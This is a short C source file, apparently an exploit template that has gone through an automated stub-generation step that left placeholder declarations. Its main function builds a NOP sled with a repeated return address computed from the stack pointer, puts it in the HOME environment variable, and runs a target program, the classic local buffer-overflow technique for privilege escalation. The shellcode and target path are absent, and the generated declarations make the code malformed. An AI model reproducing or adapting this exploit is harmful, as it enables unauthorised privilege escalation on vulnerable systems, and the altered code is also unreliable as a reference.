
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFFER ;
 int NOP ;
 int PATH ;
 int atoi (char*) ;
 int code ;
 int execl (int ,int ,int ) ;
 int getesp () ;
 int memcpy (char*,int ,int ) ;
 int memset (char*,int ,int) ;
 int setenv (char*,char*,int) ;
 int strlen (int ) ;

int main(int argc, char *argv[])
{
  int i, offset = 0;
  char buf[BUFFER];
  long address;
  if(argc > 1) offset = atoi(argv[1]);
  address = getesp() + 1000 + offset;
  memset(buf,NOP,BUFFER);
  memcpy(buf+(BUFFER-300),code,strlen(code));

  for(i=(BUFFER-250);i<BUFFER;i+=4)
  *(int *)&buf[i]=address;
  setenv("DISPLAY", "DUPA", 1);
  setenv("HOME", buf, 1);
  execl(PATH, PATH, 0);
}
